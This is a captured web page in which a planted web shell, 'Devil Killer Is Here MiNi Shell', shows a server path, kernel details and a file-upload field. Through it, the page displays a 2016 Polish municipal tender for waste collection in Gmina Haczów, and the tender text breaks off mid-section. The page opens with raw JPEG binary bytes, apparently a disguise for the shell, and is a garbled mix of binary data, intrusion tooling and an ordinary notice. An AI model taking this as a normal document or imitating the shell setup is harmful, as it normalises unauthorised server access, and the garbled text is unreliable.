JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161103/335758-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.haczow.pl' target='_blank'>http://bip.haczow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 335758 - 2016
              z dnia 2016-11-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Haczów: Odbiór  i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Haczów. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wójt Gminy Haczów, krajowy numer identyfikacyjny
              37044020600000, ul.
              Haczów 
              573,
              36213  
              Haczów, woj.
              podkarpackie, państwo
              Polska, tel.
              134 391 002, e-mail
              , faks
              134 391 696.
              <br />
              Adres strony internetowej (URL): http://bip.haczow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.haczow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie  na  adres:  Urząd  Gminy Haczów , 36-213 Haczów   nr  573 , pokój  nr 1<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór  i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Haczów. <br /><b>Numer referencyjny: </b>IIG.2781.1.8.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1) Przedmiot zamówienia obejmuje odbiór, transport i zagospodarowanie odpadów komunalnych niesegregowanych (zmieszanych) oraz zbieranych w sposób selektywny od właścicieli nieruchomości zamieszkałych  na terenie Gminy Haczów , w sposób zgodny z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2016r. poz. 250 z późn. zm.), zapisami Planu gospodarki odpadami województwa podkarpackiego  oraz przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy Haczów ,       a także innymi przepisami prawa ustawowego i miejscowego. 
2) W szczególności przedmiot zamówienia obejmuje: 
a) odbiór, transport i zagospodarowanie nie limitowanej ilości odpadów komunalnych niesegregowanych (zmieszanych) oraz zbieranych z sposób selektywny od właścicieli nieruchomości zamieszkałych  wg frakcji:   podanych  w ust.. 3  
b) odbiór transport i zagospodarowanie zgromadzonych odpadów komunalnych  z Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK); PSZOK  planowany  jest  do  utworzenia   na  terenie  gminy  Haczów w  roku  2017 .Punkt  przyjmował  będzie  następujące  rodzaje   odpadów:  roślinne odpady ulegające biodegradacji, odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny odpady niebezpieczne w tym przeterminowane leki i chemikalia, zużyte baterie i akumulatory, zużyte opony, odpady budowlane i rozbiórkowe, 
	Gmina Haczów liczy: 9.438 mieszkańców ok. 2.500 gospodarstw podzielonych na siedem sołectw. Średnia ilość wywiezionych  odpadów  komunalnych  ciągu w roku  z terenu Gminy Haczów wynosi ok. :  937,99   ton  z czego:
	ok.  351,43  t.  to  odpady  mokre
	ok.  479,93 t.  to  odpady  suche
	ok.       2,49 t. odpady  tzw.  publiczne ( z ulicznych  koszy  na śmieci)
	ok.       3,74 t.   to  odpady  zmieszane
	ok.       14,44 t. to  odpady  budowlane
	ok.       32,04 t,  to odpady  wielkogabarytowe
	ok.       0,80 t.  to  odpady  niebezpieczne  
	ok.       37,24 t. odpady  ze  spalania  paliwa  stałego  w  instalacjach c.o. ( popioły) 
ok.       9,38  tony   zużyte opony  z  pojazdów  mechanicznych ( w proporcji: 80% opony z samochodów  osobowych, dostawczych, 20 % opony z  pojazdów rolniczych).
	ok.        2,0  tony     zużyty  sprzęt  elektryczny  i  elektroniczny 
	ok.       4 ,5   tony  - odpady      roślinne   ulegające  biodegradacji  (  skoszona  trawa z  trawników ) 
Podana ilość odebranych  odpadów stanowi wartość orientacyjną i pomocniczą  dla Wykonawcy na etapie  kalkulowania  ceny oferty. Zamawiający zastrzega sobie prawo przekazania mniejszej lub większej ilości odpadów. Nie będą odbierane: odpady ciekłe, odpady nieznanego pochodzenia, odpady o składzie niezgodnym z dokumentami wymaganymi przy obrocie odpadami.  Zbiórka, wywóz i zagospodarowanie odpadów winno się odbywać zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami oraz przepisami prawa polskiego. Płatność  za  wykonane  usługi: co miesiąc  na  podstawie  wystawionej przez  Wykonawcę  faktury. 

3. Sposób i zasady wywozu: Wywozem i zagospodarowaniem odpadów objęte  będą  wyłącznie    nieruchomości  zamieszkałe. Właściciele  nieruchomości  zamieszkałych  na których  powstają odpady  komunalne obowiązani  są  do  pozbywania  się  odpadów  komunalnych  z terenu  nieruchomości w oparciu o   system segregacji odpadów  z podziałem na odpady mokre i odpady suche. Odpady mają być zgromadzone w pojemnikach/ workach zakupionych  przez Właścicieli nieruchomości z umieszczonym na nich czytelnym numerem identyfikacyjnym podatnika  nadanym  przez Urząd  Gminy  Haczów. Odpady  zmieszane, zielone oraz pozostałości  z  sortowania  odpadów  komunalnych    Wykonawca  ma ustawowy  obowiązek   dostarczyć  na  Regionalną Instalację do Przetwarzania  Odpadów    Komunalnych . Natomiast  odpady komunalne zebrane  selektywnie  do instalacji  odzysku  i  unieszkodliwiania  odpadów komunalnych , mają  być  zagospodarowane, zgodnie  z  hierarchią postępowania  z  odpadami , o  której  mowa  w  art. 7  ustawy    z  dnia   27  kwietnia 2001  r.  o odpadach. Szczegółowy  sposób i zakres świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości                                       i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi   określa Uchwała NR XX/118/2016 Rady Gminy Haczów z dnia 31 maja 2016 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi

3. Rodzaje odbieranych  i zagospodarowywanych  odpadów:  
a) odpady mokre: pojemnik/worek ma być  wypełniony   resztkami żywności  resztkami  po  kawie, herbacie ( fusy), skorupkami po jajkach  i orzechach,  zużytymi  ręcznikami  papierowymi i chusteczkami  higienicznymi, mokrym  zabrudzonym papierem, pampersami, środkami  higieny osobistej , odpadami kuchennymi,  resztkami  i  obierkami  z  owoców  i  warzyw  oraz innymi odpadami  nadającymi  się  do  kompostowania.  Opis  pojemnika /worka. Pojemnik/worek   o dowolnej  pojemności i kolorze , który zapewni  właściciel  nieruchomości
b) odpady suche: worek ma być  wypełniony  opakowaniami  z papieru i tektury, pudełkami               i  butelkami  plastikowymi, reklamówkami, foliami, puszkami   aluminiowymi i z  metali żelaznych, pojemnikami  po  produktach  mlecznych , kartonami po  napojach, gazetami, tekstyliami opakowaniami  drewnianymi, szkłem , odpadami  wielomateriałowymi. Worek  na  odpady  suche przeźroczysty o pojemności 120 litrów z  nadrukiem  Odpady segregowane  suche ,  który zapewni  właściciel  nieruchomości
c) Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów niesegregowanych  o  dowolnej  pojemności  i  kolorze,  które  zapewni właściciel nieruchomości i ustawi je w miejscach utwardzonych lub altanach śmietnikowych.

4.Częstotliwość  wywozu  odpadów   wymienionych w pkt. 3  lit. a,b,c  co  dwa  tygodnie  lub co tydzień  wg  harmonogramu  opracowanego  i załączonego  do  oferty  przez  Wykonawcę.

5.Miejsca  odbioru  odpadów: Odpady na  czas  odbioru  przez Wykonawcę  maja  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek  wg załączonej   do  niniejszej SIWZ  mapki  wskazującej  sieć  dróg  przebiegających  przez  teren  gminy Haczów. Ze względu na to, że  odbiór i transport  odpadów  odbywał się  będzie po sieci  dróg  zlokalizowanych  na terenie  gminy Haczów   w skład  których  wchodzą  drogi  : krajowa, wojewódzkie, powiatowe i  gminne, koniecznym  będzie  dostosowanie   pojazdów do warunków terenowych. Przeważającą  ilość   stanowią  drogi  gminne o szerokości  ok. 3 m usytuowane  w części  na terenie górzystym. Kalkulując  tabor  samochodowy  przeznaczony  do  wykonywania   usług  odbioru  i  zagospodarowania  odpadów  należy  uwzględnić powyższe  warunki. Wskazane jest  aby  wykonawca  posiadał leki  samochód  do  3,5  t.  umożliwiający odbiór  z odpadów  z terenów trudno dostępnych       i  o  małej  gęstości  zaludnienia.  
6. Miejsce  wywozu i zagospodarowania odpadów: zgodnie z  ustawą  o  utrzymaniu  czystości  i  porządku w  gminach  i   Wojewódzkim Planem Gospodarki  Odpadami. 
7. Inne  odpady odbierane i  zagospodarowywane  przez Wykonawcę: 
a)odpady wielkogabarytowe : odbiór odpadów wielkogabarytowych będzie się odbywać  poprzez odbieranie wystawionych w/w odpadów przez właścicieli nieruchomości. Miejsca  odbioru  odpadów: Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku w sierpniu. Po  utworzeniu PSZOK  odbiór również z  Punktu  selektywnej  zbiórki  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
 b) zużyty sprzęt  elektryczny i elektroniczny, baterie  - Po  utworzeniu PSZOK  odbiór  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
c)odpady budowlane,  raz  w  roku podczas  zbiórki  organizowanej przez  Urząd  Gminy  Haczów  z terenu całej  gminy. Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku we wrześniu. Po  utworzeniu PSZOK  odbiór również z  Punktu  selektywnej  zbiórki  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
d) odpady niebezpieczne typu leki, farby  , lakiery , środki  ochrony  roślin wraz  opakowaniami :  raz   w  roku podczas  zbiórki  organizowanej przez  Urząd  Gminy  Haczów  z terenu całej  gminy. Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku w  październiku . Po  utworzeniu PSZOK  odbiór również z  Punktu  selektywnej  zbiórki  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
e) zużyte  opony:  Po  utworzeniu PSZOK  odbiór  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
f) odpady komunalne  zmieszane tzw.  publiczne  ( z koszy  na śmieci  zlokalizowanych w miejscach  publicznych) Częstotliwość wywozu : dwa  razy  w  miesiącu. Miejsce zbiórki: place  przed  Domami  Ludowymi i Urzędem Gminy w Haczowie.
g) popiół  z instalacji  c.o. budynków  mieszkalnych . Częstotliwość wywozu  raz  w  miesiącu. W  miesiącach od  października  do  kwietnia .Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek.
h) odpady  roślinne  odpady ulegające  biodegradacji ( skoszona  trawa  z  trawników) Po  utworzeniu PSZOK  odbiór  wg  potrzeb  zgłaszanych  przez  Zamawiającego.
i) zużyte opony z  pojazdów  mechanicznych. Po  utworzeniu PSZOK  odbiór  wg  potrzeb  zgłaszanych  przez  Zamawiającego.

8. Obowiązki  wykonawcy: 
- odbiór i zagospodarowanie  odpadów  od właścicieli  nieruchomości zamieszkałych   z terenu  Gminy Haczów zgodnie  z harmonogramem  w tym  przekazywanie   odebranych od właścicieli  nieruchomości selektywnie zebranych  odpadów komunalnych  do  instalacji odzysku i unieszkodliwiania  odpadów , zgodnie  z  hierarchią postępowania  z  odpadami  określoną  w  ustawie  o  odpadach.
- przekazywanie  odebranych  od  właścicieli  nieruchomości zmieszanych  odpadów  komunalnych, odpadów  zielonych oraz  pozostałości z  sortowania odpadów przeznaczonych  do  składowania  na  regionalnej  instalacji do  przetwarzania  odpadów  komunalnych.
-  odbiór  i  zagospodarowanie  odpadów z  PSZOK
-informowanie Zamawiającego o przypadkach  niedopełniania przez  właściciela/li  nieruchomości obowiązku  w  zakresie selektywnego zbierania  odpadów  komunalnych. 
- sporządzanie  półrocznych   sprawozdań  i przekazywanie ich zamawiającemu  w terminie   do końca miesiąca następującego po upływie półrocza, którego dotyczy , zgodnie z ustawą o utrzymaniu  czystości  i porządku  w gminach. 
 - wykonywanie obowiązków  wynikających  z  aktualnie  obowiązujących ustaw i rozporządzeń w zakresie  gospodarowania  odpadami.,
<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90510000-5,
                90512000-9,
                05130000-6,
                05140000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca  spełni  warunek  jeżeli  wykaże , że : 
-  jest  wpisany    do  rejestru działalności  regulowanej   prowadzonego  przez  Wójta  Gminy Haczów  w  zakresie  odbierania  odpadów     komunalnych  od  właścicieli  nieruchomości   nieruchomości  zgodnie  z  wymogami    ustawy  z  dnia  13  września  1996r.  o  utrzymaniu  czystości  i porządku  w  gminach  ( Dz.U. z  2016 poz.  250    z  póź.  zm. ) 
-  posiada   aktualne   zezwolenie  na  transport odpadów     bądź  zaświadczenie  o  wpisie  do  rejestru  prowadzących  transport  odpadów   zgodnie  z  ustawa    z  dnia  14  grudnia  2012 r. o  odpadach  ( Dz.U.  z  2013     poz. 21  z  póź.  zm. 
-   jest  wpisany   do  rejestrów  podmiotów     zbierających  zużyty  sprzęt  elektryczny  i   elektroniczny  prowadzony  przez    Głównego  Inspektora  Ochrony  Środowiska.  
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że: 
 posiada środki finansowe lub zdolność kredytową na kwotę równą co najmniej 365.000,00  zł. 

<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że: 
- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał 2 usługi  odbioru  odpadów  komunalnych wykonanych  na  rzecz  właścicieli  nieruchomości  lub gmin  w  sposób  ciągły  przez  okres  minimum  12 miesięcy  o masie   minimum  900 Mg / rok oraz potwierdzeniem , że usługi te zostały wykonane  należycie.
- dysponuje  lub  będzie  dysponował   niezbędnym  do  wykonania  narzędziami  i  urządzeniami  określonymi szczegółowo  w  Rozporządzeniu  Ministra  Środowiska  z  dnia  11  stycznia  2013 r.  w  sprawie   szczegółowych   wymagań  w  zakresie  odbierania   odpadów  komunalnych od  właścicieli  nieruchomości tj:
- co  najmniej  dwóch  pojazdów  przystosowanych  do  odbierania   zmieszanych   odpadów  komunalnych 
- co najmniej  dwóch  pojazdów  przystosowanych do  odbierania   selektywnie  zebranych  odpadów  komunalnych 
co  najmniej  jeden  pojazd    do  odbierania    odpadów  bez  funkcji  kompaktującej. 
Konstrukcja  pojazdów zabezpieczać  ma  przed  rozwiewaniem , rozpylaniem  przewożonych  odpadów  oraz minimalizowaniem  oddziaływania  czynników  atmosferycznych  na  odpady. 
 Pojazdy  mają  być    wyposażone  w  system:
- monitoringu  bazującego  na   systemie  pozycjonowania  satelitarnego, umożliwiający  trwałe  zapisywanie, przechowywanie i odczytywanie  danych  o  położeniu pojazdu                                               i  miejscach  postoju oraz  czujników     zapisujących  dane  o  miejscach    wyładunku  odpadów -  umożliwiający  weryfikację   tych  danych
- pojazdy mają  być   wyposażone  w  narzędzia  lub  urządzenia  umożliwiające sprzątanie   terenu  po   opróżnieniu  pojemników  oraz  urządzenie  do  ważenia  odpadów  komunalnych 
Wyposażenie  bazy  magazynowo  sprzętowej ma  być  zgodne   z  cyt. wyżej  Rozporządzeniem  Ministra  Środowiska  w  sprawie szczegółowych   wymagań  w  zakresie   odbierania  odpadów  komunalnych   od  właścicieli  nieruchomości § 2  ust 1 ,2 ,3,4 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
